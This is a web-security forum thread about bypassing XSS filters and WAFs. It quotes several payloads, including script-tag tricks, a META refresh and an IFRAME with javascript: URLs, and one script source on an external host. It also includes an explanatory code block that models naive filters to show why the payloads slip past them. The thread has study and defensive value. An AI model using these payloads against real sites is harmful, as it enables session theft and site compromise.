Script obfuscation, filter evasion, IDS/IPS/WAF bypassing... this is where it should live. Because this topic is too big to live anywhere else. Phj33r! 
Bypass 2012 XSS
Posted by: Vaibs
Date: November 02, 2012 09:18AM

On my blog: http://adf.ly/E81iz

XSS bypass without using alphanumeric characters.
XSS bypass without using <script>, ", /, alert, etc.

Vaibs

Re: Bypass 2012 XSS
Posted by: rickm
Date: November 07, 2012 04:36AM

Hi Vaibs

Thanks for sharing. I'm learning XSS and I loved your website; however, I was unable to reproduce many of your payloads to bypass a WAF. I'm using Firefox and I tested them against the IBM WatchFire demo site that is constructed to be vulnerable.

For example, this basic XSS input works as expected:

http://demo.testfire.net/search.aspx?txtSearch=<script>alert(1)</script>

However, none of your XSS payloads below are working. Could you please take a look and, if possible, provide a working XSS payload for this site? I would love to test and see your payloads working.

When the input box is validated to allow only a limited set of characters:
'';!--"<XSS>=&{()}
!--"<XSS>=&amp;
'-!aleRT(3)/*'

When the engine matches the <script> tag by detecting the first opening "<" and the first closing ">":
<><<<SCRIPT><>>>alert('/Vaibs');//<<<</SCRIPT>>

When the engine matches the </script> end tag:
<SCRIPT SRC=http://vaibs.in/blog< B >
or
<SCRIPT> aAlert(3);?/u>


Meta tags never contribute toward headers, but they can lead to XSS.
<META HTTP-EQUIV="refresh" CONTENT="0; url=javascript:ALERT(/Vaibs/);"/>

Iframes are many times not filtered by the WAF, so we can inject JS inside.
<IFRAME src="javascript:Alert(/Vaibs/);"></IFRAME>

Thanks.
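The two "engine matching" cases quoted above (a filter that only inspects the first "<...>" it finds, and one that only looks for a closing </script>) come down to a mismatch between how the filter finds tags and how the browser's tokenizer finds them. The block below is an added example, not code from the post or from Vaibs' blog: it models both naive filters as hypothetical reconstructions (no real WAF's rules are assumed), runs the payloads quoted above through them, and compares the result with a simplified browser-style tag scan in which a "<" not followed by a letter is plain text. The payload strings are copied verbatim from the post; the filter and tokenizer logic is my own.

```javascript
// Added example: naive filter vs. browser-style tag scan (hypothetical filter rules).

// Payloads quoted in the thread, copied verbatim.
const PAYLOADS = [
  "<script>alert(1)</script>",                          // baseline that the demo site accepts
  "<><<<SCRIPT><>>>alert('/Vaibs');//<<<</SCRIPT>>",    // aimed at a first-tag filter
  "<SCRIPT SRC=http://vaibs.in/blog< B >",               // aimed at an end-tag filter
  "<SCRIPT> aAlert(3);?/u>",                             // aimed at an end-tag filter
];

// Hypothetical filter A: take the text between the first "<" and the first
// ">" and block only if that span is a <script ...> tag.
function naiveFirstTagBlocks(input) {
  const open = input.indexOf("<");
  const close = open === -1 ? -1 : input.indexOf(">", open);
  if (open === -1 || close === -1) return false;
  const tag = input.slice(open + 1, close).trim().toLowerCase();
  return /^script\b/.test(tag);
}

// Hypothetical filter B: block only if a closing </script> tag is present.
function naiveEndTagBlocks(input) {
  return /<\/script\s*>/i.test(input);
}

// Simplified browser-style scan: a "<" (optionally "</") followed by an
// ASCII letter starts a tag name; "<" followed by anything else is text.
// So "<<<SCRIPT>" still yields a SCRIPT tag. Returns lowercase tag names in
// document order. (Script-data state is not modelled; enough for this thread.)
function tokenizeTagNames(input) {
  const names = [];
  const re = /<\/?([a-zA-Z][^\s\/>]*)/g;
  let m;
  while ((m = re.exec(input)) !== null) names.push(m[1].toLowerCase());
  return names;
}

// A payload bypasses a filter when the tokenizer sees a script tag but the
// filter does not block the input.
function bypasses(filter, input) {
  return tokenizeTagNames(input).includes("script") && !filter(input);
}

// One row per payload: which of the two naive filters it slips past.
function report() {
  return PAYLOADS.map((p) => ({
    payload: p,
    firstTagBypass: bypasses(naiveFirstTagBlocks, p),
    endTagBypass: bypasses(naiveEndTagBlocks, p),
  }));
}

for (const row of report()) console.log(row);
```

`report()` shows the double-"<" payload slipping past the first-tag filter only, and the two payloads without a closing tag slipping past the end-tag filter only; the baseline is caught by both. The practical lesson is that a filter should tokenize the input the same way the browser does (or use a real HTML parser) rather than pattern-matching on the first angle brackets it sees. Note also what the tokenizer hands to the script engine for the second payload: the text between the SCRIPT start and end tags is `<>>>alert('/Vaibs');//<<<`, which is not valid JavaScript, so a browser will parse the tag but the alert will not run.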

Re: Bypass 2012 XSS
Posted by: hack2012
Date: June 04, 2013 09:46PM

thanks
